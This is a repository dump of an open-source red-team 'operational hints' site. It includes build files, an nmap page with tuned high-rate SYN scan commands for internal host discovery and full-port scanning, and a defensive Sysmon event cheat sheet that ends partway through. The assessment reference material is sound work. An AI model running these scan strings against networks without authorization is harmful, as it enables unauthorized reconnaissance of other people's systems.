├── .github └── workflows │ └── ci.yml ├── .gitignore ├── LICENSE ├── README.md ├── docs ├── building.md ├── contributing.md ├── img │ ├── facebook_cover_photo_1.png │ ├── facebook_cover_photo_2.png │ ├── facebook_profile_image.png │ ├── favicon.png │ ├── instagram_profile_image.png │ ├── linkedin_banner_image_1.png │ ├── linkedin_banner_image_2.png │ ├── linkedin_profile_image.png │ ├── logo.png │ ├── logo_transparent.png │ ├── logo_transparent_crop.jpg │ ├── pinterest_board_photo.png │ ├── pinterest_profile_image.png │ ├── twitter_header_photo_1.png │ ├── twitter_header_photo_2.png │ ├── twitter_profile_image.png │ └── youtube_profile_image.png ├── index.md ├── license.md ├── osint │ └── email.md ├── scanning │ └── nmap.md ├── soc │ └── sysmon │ │ └── sysmon.md ├── stylesheets │ └── extra.css ├── web_app │ └── sql_injections.md └── windows │ ├── collection_operations.md │ ├── lat_movement.md │ ├── local_sa_cmds.md │ ├── network_sa_cmds.md │ ├── persistence.md │ ├── priv_esc.md │ ├── remote_alteration.md │ └── remote_sa_cmds.md ├── mkdocs.yml ├── poetry.lock └── pyproject.toml /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: ci 2 | on: 3 | - push 4 | - pull_request 5 | 6 | # Jobs to run 7 | jobs: 8 | 9 | # Deploy docs to github 10 | deploy: 11 | if: github.event_name != 'pull_request' && github.ref == 'refs/heads/master' 12 | runs-on: ubuntu-latest 13 | steps: 14 | 15 | # Checkout source from GitHub 16 | - uses: actions/checkout@v2 17 | 18 | # Install Python runtime and dependencies 19 | - uses: actions/setup-python@v1 20 | with: 21 | python-version: 3.7 22 | 23 | - name: Install poetry 24 | shell: bash 25 | run: | 26 | curl -fsS -o get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py 27 | python get-poetry.py --preview -y 28 | echo "::set-env name=PATH::$HOME/.poetry/bin:$PATH" 29 | 30 | - name: Configure poetry 31 | shell: bash 32 | run: poetry config 
virtualenvs.in-project true 33 | 34 | - name: Set up cache 35 | uses: actions/cache@v1 36 | id: cache 37 | with: 38 | path: .venv 39 | key: venv-${{ runner.os }}-${{ steps.full-python-version.outputs.version }}-${{ hashFiles('**/poetry.lock') }} 40 | 41 | - name: Ensure cache is healthy 42 | if: steps.cache.outputs.cache-hit == 'true' 43 | shell: bash 44 | run: poetry run pip --version >/dev/null 2>&1 || rm -rf .venv 45 | 46 | - name: Install dependencies 47 | shell: bash 48 | run: poetry install 49 | 50 | # Set configuration for repository and deploy documentation 51 | - env: 52 | GH_TOKEN: ${{ secrets.GH_TOKEN }} 53 | GH_NAME: ${{ secrets.GH_NAME }} 54 | GH_EMAIL: ${{ secrets.GH_EMAIL }} 55 | run: | 56 | REMOTE="https://${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}" 57 | git config --global user.name "${GH_NAME}" 58 | git config --global user.email "${GH_EMAIL}" 59 | git remote set-url origin ${REMOTE} 60 | 61 | - run: | 62 | poetry run mkdocs gh-deploy --force 63 | poetry run mkdocs --version -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Obscurity Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![image](docs/img/facebook_cover_photo_2.png#center) 2 | 3 |

4 | Your one stop resource for operational hints. 5 |

6 | 7 | 8 | ## What is this project? 9 | 10 | 11 | This project aims to provide a single source of common operational hints seen on **Web/Application**, **Network**, and **Red Team** assessments. While this project is scalable, it may not cover every single scenario applicable to your needs; that's why we need feedback. 12 | 13 | > *Please understand that this is an **Open Source** project that is driven by **community** feedback. If you do not contribute, who will? Please take the time to correct, update, or even make a pull request when you are feeling up to the task.* 14 | 15 | ## Status of Operator Up 16 | 17 | This project is purely driven by operators and commands of operators on live OPs. That being said, it does have some basic development efforts to maintain it and ensure content is accurate. 18 | 19 | | Branch | Status | 20 | | :----: | :----: | 21 | | Master | ![Deployment CI](https://github.com/obscuritylabs/operator-up/workflows/ci/badge.svg?branch=master) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![HitCount](http://hits.dwyl.com/obscuritylabs/operator-up.svg)](http://hits.dwyl.com/obscuritylabs/operator-up) [![Join the chat at https://gitter.im/obscuritylabs/operator-up](https://badges.gitter.im/obscuritylabs/operator-up.svg)](https://gitter.im/obscuritylabs/operator-up?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) | 22 | 23 | ## Table of Contents 24 | 25 | ### Windows 26 | 27 | - [Windows Privilege Escalation Commands](windows/priv_esc/) 28 | - [Windows Situational Awareness Commands](windows/local_sa_cmds/) 29 | - [Windows Remote Situational Awareness Commands](windows/remote_sa_cmds/) 30 | - [Windows Network Situational Awareness Commands](windows/network_sa_cmds/) 31 | - [Windows Lateral Movement](windows/lat_movement/) 32 | - [Windows Persistence](windows/persistence/) 33 | 34 | ### Scanning 35 | 36 | - [NMAP Scanning 
Techniques](scanning/nmap/) 37 | 38 | ### Web Application 39 | 40 | - [SQL Injections](web_app/sql_injections/) 41 | -------------------------------------------------------------------------------- /docs/building.md: -------------------------------------------------------------------------------- 1 | # Building Operator Up Docs 2 | 3 | ## Setup Development Environment 4 | 5 | First make sure you have poetry installed, then initialize your virtual environment with the following commands: 6 | 7 | Install the requirements: 8 | ```bash 9 | poetry install 10 | ``` 11 | 12 | Start the venv shell: 13 | ```bash 14 | poetry shell 15 | ``` 16 | 17 | ## Start The Local Development Server 18 | You can start adding to and hacking away on the documentation with live reload. 19 | We use this to ensure all documentation nicely fits on the page and any content added will be seamless for users. 20 | 21 | ```bash 22 | mkdocs serve 23 | ``` -------------------------------------------------------------------------------- /docs/contributing.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Interested in contributing to Operator Up? Want to report an issue? Before you do, please read the following guidelines. 4 | 5 | ## Submission context 6 | ### Got a question or problem? 7 | For quick questions there's no need to open an issue as you can reach us on gitter.im. 8 | 9 | ### Need to make a correction to the content? 10 | If you found a bug within the docs, you can help us by submitting an issue to the issue tracker in our GitHub repository. Even better, you can submit a Pull Request with a fix. However, before doing so, please read the submission guidelines. 11 | 12 | ### Missing a TTP, Section, Tool Cheat sheet? 13 | You can request a new feature by submitting an issue to our GitHub Repository. 
If you would like to implement a new section, please submit an issue with a proposal for your work first, to be sure that it is of use for everyone. Please consider what kind of change it is: 14 | 15 | * For a major section, first open an issue and outline your proposal so that it can be discussed. This will also allow us to better coordinate our efforts, prevent duplication of work, and help you to craft the change so that it is successfully accepted into the project. 16 | * Small tool additions, cheat sheets and TTPs can be crafted and directly submitted as a Pull Request. However, there is no guarantee that your PR will make it into the master, as it's always a matter of opinion whether it benefits the overall project. 17 | 18 | ## Submission guidelines 19 | ### Submitting an issue 20 | Before you submit an issue, please search the issue tracker; maybe an issue for your problem already exists and the discussion might inform you of workarounds readily available. 21 | 22 | We want to fix all the issues as soon as possible, but before fixing a bug we need to reproduce and confirm it. In order to reproduce bugs we will systematically ask you to provide a minimal reproduction scenario using the custom issue template. Please stick to the issue template. 23 | 24 | ### Submitting a Pull Request (PR) 25 | Search GitHub for an open or closed PR that relates to your submission. You don't want to duplicate effort. If you do not find a related issue or PR, go ahead. 26 | 27 | 1. **Development**: Fork the project, set up the development environment, make your changes in a separate git branch and add descriptive messages to your commits. 28 | 29 | 2. **Build**: Before submitting a pull request, build the docs using `mkdocs`. This is a mandatory requirement for your PR to get accepted, as all docs must be compiled and pass our CI before we accept it. 30 | 31 | 3. 
**Pull Request**: After building the docs, commit the compiled output, push your branch to GitHub and send a PR to the `master` branch. If we suggest changes, make the required updates, rebase your branch and push the changes to your GitHub repository, which will automatically update your PR. 32 | 33 | After your PR is merged, you can safely delete your branch and pull the changes from the main (upstream) repository. 34 | 35 | ## Acknowledgments 36 | This page is based off: https://squidfunk.github.io/mkdocs-material/contributing/ as they have a great submission criteria setup. -------------------------------------------------------------------------------- /docs/img/facebook_cover_photo_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_cover_photo_1.png -------------------------------------------------------------------------------- /docs/img/facebook_cover_photo_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_cover_photo_2.png -------------------------------------------------------------------------------- /docs/img/facebook_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_profile_image.png -------------------------------------------------------------------------------- /docs/img/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/favicon.png -------------------------------------------------------------------------------- 
/docs/img/instagram_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/instagram_profile_image.png -------------------------------------------------------------------------------- /docs/img/linkedin_banner_image_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_banner_image_1.png -------------------------------------------------------------------------------- /docs/img/linkedin_banner_image_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_banner_image_2.png -------------------------------------------------------------------------------- /docs/img/linkedin_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_profile_image.png -------------------------------------------------------------------------------- /docs/img/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo.png -------------------------------------------------------------------------------- /docs/img/logo_transparent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo_transparent.png -------------------------------------------------------------------------------- 
/docs/img/logo_transparent_crop.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo_transparent_crop.jpg -------------------------------------------------------------------------------- /docs/img/pinterest_board_photo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/pinterest_board_photo.png -------------------------------------------------------------------------------- /docs/img/pinterest_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/pinterest_profile_image.png -------------------------------------------------------------------------------- /docs/img/twitter_header_photo_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_header_photo_1.png -------------------------------------------------------------------------------- /docs/img/twitter_header_photo_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_header_photo_2.png -------------------------------------------------------------------------------- /docs/img/twitter_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_profile_image.png 
-------------------------------------------------------------------------------- /docs/img/youtube_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/youtube_profile_image.png -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | ![image](img/facebook_cover_photo_2.png#center) 2 | 3 |

4 | Your one stop resource for operational hints. 5 |

6 | 7 | 8 | ## What is this project? 9 | 10 | 11 | This project aims to provide a single source of common operational hints seen on **Web/Application**, **Network**, and **Red Team** assessments. While this project is scalable, it may not cover every single scenario applicable to your needs; that's why we need feedback. 12 | 13 | > *Please understand that this is an **Open Source** project that is driven by **community** feedback. If you do not contribute, who will? Please take the time to correct, update, or even make a pull request when you are feeling up to the task.* 14 | 15 | ## Status of Operator Up 16 | 17 | This project is purely driven by operators and commands of operators on live OPs. That being said, it does have some basic development efforts to maintain it and ensure content is accurate. 18 | 19 | | Branch | Status | 20 | | :----: | :----: | 21 | | Master | ![Deployment CI](https://github.com/obscuritylabs/operator-up/workflows/ci/badge.svg?branch=master) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![HitCount](http://hits.dwyl.com/obscuritylabs/operator-up.svg)](http://hits.dwyl.com/obscuritylabs/operator-up) [![Join the chat at https://gitter.im/obscuritylabs/operator-up](https://badges.gitter.im/obscuritylabs/operator-up.svg)](https://gitter.im/obscuritylabs/operator-up?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) | 22 | 23 | ## Table of Contents 24 | 25 | ### Windows 26 | 27 | - [Windows Privilege Escalation Commands](windows/priv_esc/) 28 | - [Windows Situational Awareness Commands](windows/local_sa_cmds/) 29 | - [Windows Remote Situational Awareness Commands](windows/remote_sa_cmds/) 30 | - [Windows Network Situational Awareness Commands](windows/network_sa_cmds/) 31 | - [Windows Lateral Movement](windows/lat_movement/) 32 | - [Windows Remote Alteration ](windows/remote_alteration/) 33 | - [Windows Persistence](windows/persistence/) 34 | - 
[Windows Collection Operations](windows/collection_operations/) 35 | 36 | ### Scanning 37 | 38 | - [NMAP Scanning Techniques](scanning/nmap/) 39 | 40 | ### Web Application 41 | 42 | - [SQL Injections](web_app/sql_injections/) 43 | -------------------------------------------------------------------------------- /docs/license.md: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Obscurity Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAM -------------------------------------------------------------------------------- /docs/osint/email.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /docs/scanning/nmap.md: -------------------------------------------------------------------------------- 1 | # NMAP Scanning Techniques 2 | 3 | ## Internal Host Discovery 4 | 5 | !!! tip 6 | A few small tips about the following nmap scanning string: 7 | 8 | * 255 min host group is recommended. 9 | * min rate 6000 is recommended to keep kernel pumping packets. 10 | 11 | ```bash 12 | nmap -Pn -n -sS -vvv -p 21-23,25,53,111,137,139,445,80,443,8443,8080 \ 13 | --min-hostgroup 255 \ 14 | --min-rtt-timeout 0ms \ 15 | --max-rtt-timeout 100ms \ 16 | --max-retries 1 \ 17 | --max-scan-delay 0 \ 18 | --min-rate 6000 \ 19 | --open \ 20 | -oA CLIENT-# \ 21 | -iL 22 | ``` 23 | 24 | ## Internal Full Scope Hit and Run String using Syn Half Scan 25 | 26 | !!! tip 27 | A few small tips about the following nmap scanning string: 28 | 29 | * 255 min host group is recommended. 30 | * min rate 1000 should be fine for internal scanning with decent accuracy of results. 31 | * Full Port Scan / --open is used for further parsing. 
32 | 33 | ```bash 34 | nmap -Pn -n -sS -p- -sV -vvv --min-hostgroup 255 \ 35 | --min-rtt-timeout 25ms \ 36 | --max-rtt-timeout 100ms \ 37 | --max-retries 1 \ 38 | --max-scan-delay 0 \ 39 | --min-rate 1000 \ 40 | --open \ 41 | -oA \ 42 | -iL 43 | ``` -------------------------------------------------------------------------------- /docs/soc/sysmon/sysmon.md: -------------------------------------------------------------------------------- 1 | # Sysmon 2 | 3 | ## Sysmon cheat sheet 4 | 5 | | ID | Name | Tag | 6 | | --- | -------------------- | ------------------------------------------------ | 7 | | 1 | ProcessCreate | Process Create | 8 | | 2 | FileCreateTime | File creation time | 9 | | 3 | NetworkConnect | Network connection detected | 10 | | 4 | N/A | Sysmon service state change (cannot be filtered) | 11 | | 5 | ProcessTerminate | Process terminated | 12 | | 6 | DriverLoad | Driver Loaded | 13 | | 7 | ImageLoad | Image loaded | 14 | | 8 | CreateRemoteThread | CreateRemoteThread detected | 15 | | 9 | RawAccessRead | RawAccessRead detected | 16 | | 10 | ProcessAccess | Process accessed | 17 | | 11 | FileCreate | File created | 18 | | 12 | RegistryEvent | Registry object added or deleted | 19 | | 13 | RegistryEvent | Registry value set | 20 | | 14 | RegistryEvent | Registry object renamed | 21 | | 15 | FileCreateStreamHash | File stream created | 22 | | 16 | n/a | Sysmon configuration change (cannot be filtered) | 23 | | 17 | PipeEvent | Named pipe created | 24 | | 18 | PipeEvent | Named pipe connected | 25 | | 19 | WmiEvent | WMI filter | 26 | | 20 | WmiEvent | WMI consumer | 27 | | 21 | WmiEvent | WMI consumer filter | 28 | | 22 | DNSQuery | DNS query | 29 | | 23 | FileDelete | File Delete archived | 30 | | 24 | ClipboardChange | New content in the clipboard | 31 | | 25 | ProcessTampering | Process image change | 32 | | 26 | FileDeleteDetected | File Delete logged | 33 | 34 | ## Sysmon Elastic ECS cheat sheet 35 | 36 | ### EventID 1 Process Create 37 | 38 | The 
process creation event provides extended information about a newly created process. The full command line provides context on the process execution. The ProcessGUID field is a unique value for this process across a domain to make event correlation easier. The hash is a full hash of the file with the algorithms in the HashType field. 39 | 40 | #### Event Log Entry 41 | 42 | | Field | Detail | 43 | | ----------------- | --------------------------------------------------------------------------------------------------------------------------------------------- | 44 | | UtcTime | Time in UTC when event was created | 45 | | ProcessGuid | Process Guid of the process that got spawned/created (child) | 46 | | ProcessId | Process ID used by the OS to identify the created process (child) | 47 | | Image | File path of the process being spawned/created. Considered also the child or source process | 48 | | FileVersion | Version of the image associated with the main process (child) | 49 | | Description | Description of the image associated with the main process (child) | 50 | | Product | Product name the image associated with the main process (child) belongs to | 51 | | OriginalFileName | OriginalFileName from the PE header, added on compilation | 52 | | Company | Company name the image associated with the main process (child) belongs to | 53 | | CommandLine | Arguments which were passed to the executable associated with the main process | 54 | | CurrentDirectory | The path without the name of the image associated with the process | 55 | | User | Name of the account that created the process (child) . It usually contains domain name and username | 56 | | LogonGuid | Logon GUID of the user who created the new process. Value that can help you correlate this event with others that contain the same Logon GUID | 57 | | LogonId | Login ID of the user who created the new process. 
Value that can help you correlate this event with others that contain the same Logon ID | 58 | | TerminalSessionId | ID of the session the user belongs to | 59 | | IntegrityLevel | Integrity label assigned to a process | 60 | | Hashes | Full hash of the file with the algorithms in the HashType field | 61 | | ParentProcessGuid | ProcessGUID of the process that spawned/created the main process (child) | 62 | | ParentProcessId | Process ID of the process that spawned/created the main process (child) | 63 | | ParentImage | File path that spawned/created the main process | 64 | | ParentCommandLine | Arguments which were passed to the executable associated with the parent process | 65 | | ParentUser | Name of the account that created the parent process. It usually contains domain name and username | 66 | 67 | #### Elastic ECS Mapping 68 | 69 | ```text 70 | Process Create: 71 | RuleName: technique_id=T1218.002,technique_name=rundll32.exe 72 | UtcTime: 2022-01-29 05:33:08.667 73 | ProcessGuid: {a7262f76-d194-61f4-c000-000000000900} 74 | ProcessId: 1168 75 | Image: C:\Windows\System32\rundll32.exe 76 | FileVersion: 10.0.19041.746 (WinBuild.160101.0800) 77 | Description: Windows host process (Rundll32) 78 | Product: Microsoft® Windows® Operating System 79 | Company: Microsoft Corporation 80 | OriginalFileName: RUNDLL32.EXE 81 | CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask 82 | CurrentDirectory: C:\Windows\system32\ 83 | User: NT AUTHORITY\SYSTEM 84 | LogonGuid: {a7262f76-d0ce-61f4-e703-000000000000} 85 | LogonId: 0x3E7 86 | TerminalSessionId: 0 87 | IntegrityLevel: System 88 | Hashes: SHA1=DD399AE46303343F9F0DA189AEE11C67BD868222,MD5=EF3179D498793BF4234F708D3BE28633,SHA256=B53F3C0CD32D7F20849850768DA6431E5F876B7BFA61DB0AA0700B02873393FA,IMPHASH=4DB27267734D1576D75C991DC70F68AC 89 | ParentProcessGuid: {a7262f76-d0d6-61f4-2d00-000000000900} 90 | ParentProcessId: 1956 91 | ParentImage: C:\Windows\System32\svchost.exe 92 | 
ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 93 | ParentUser: NT AUTHORITY\SYSTEM 94 | ``` 95 | 96 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 97 | |----|----|----| 98 | | event.action | N/A | | 99 | | event.category | process | | 100 | | event.code | 1 | | 101 | | event.created | Jan 30, 2022 @ 21:51:17.092 | UtcTime | 102 | | event.kind | event | N/A | 103 | | event.module | sysmon | N/A | 104 | | event.provider | Microsoft-Windows-Sysmon | N/A | 105 | | event.type | start, process_start | n/a | 106 | | hash.imphash | b71cb3ac5c352bec857c940cbc95f0f3 | Hashes | 107 | | hash.md5 | 60ff40cfd7fb8fe41ee4fe9ae5fe1c51 | Hashes | 108 | | hash.sha1 | 3ea7cc066317ac45f963c2227c4c7c50aa16eb7c | Hashes | 109 | | hash.sha256 | 2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3 | Hashes | 110 | | process.args | C:\Windows\system32\rundll32.exe, C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask | CommandLine | 111 | | process.command_line | C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask | CommandLine | 112 | | process.entity_id | {a754cc8d-0794-61f8-d001-000000000d00} | ProcessGuid | 113 | | process.executable | C:\Windows\System32\rundll32.exe | Image | 114 | | process.parent.args | C:\Windows\system32\svchost.exe, -k, netsvcs, -p, -s, Schedule | ParentCommandLine | 115 | | process.parent.command_line | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | ParentCommandLine | 116 | | process.parent.entity_id | {a754cc8d-d9d1-61f7-2600-000000000d00} | ParentProcessGuid | 117 | | process.parent.name | svchost.exe | ParentImage | 118 | | process.parent.pid | 1632 | ParentProcessId | 119 | | process.pe.company | Microsoft Corporation | Company | 120 | | process.pe.description | Windows host process (Rundll32) | Description | 121 | | process.pe.product | Microsoft® Windows® Operating System | Product | 122 | | process.pid | 5316 | ProcessId | 123 | | process.working_directory | 
C:\Windows\system32\ | CurrentDirectory | 124 | | related.hash | dd399ae46303343f9f0da189aee11c67bd868222, ef3179d498793bf4234f708d3be28633, b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa, 4db27267734d1576d75c991dc70f68ac | Hashes | 125 | | related.user | SYSTEM | User | 126 | | user.domain | NT AUTHORITY | User | 127 | | user.id | S-1-5-18 | LogonId | 128 | | user.name | SYSTEM | User | 129 | 130 | ### EventID 2 File creation time changed 131 | 132 | The change file creation time event is registered when a file creation time is explicitly modified by a process. This event helps track the real creation time of a file. Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. When triaging, compare CreationUtcTime with PreviousCreationUtcTime and check which Image made the change. 133 | 134 | #### Event Log Entry 135 | 136 | | Field | Detail | 137 | | ----------------------- | --------------------------------------------------------------------------------------- | 138 | | UtcTime | Time in UTC when event was created | 139 | | ProcessGuid | Process Guid of the process that changed the file creation time | 140 | | ProcessId | Process ID used by the OS to identify the process changing the file creation time | 141 | | Image | File path of the process that changed the file creation time | 142 | | TargetFilename | Full path name of the file | 143 | | CreationUtcTime | New creation time of the file | 144 | | PreviousCreationUtcTime | Previous creation time of the file | 145 | | User | Name of the account that created the file. It usually contains domain name and username | 146 | 147 | #### Elastic ECS Mapping 148 | 149 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 150 | |----|----|----| 151 | 152 | ### EventID 3 Network connection 153 | 154 | The network connection event logs TCP/UDP connections on the machine. It is disabled by default. 
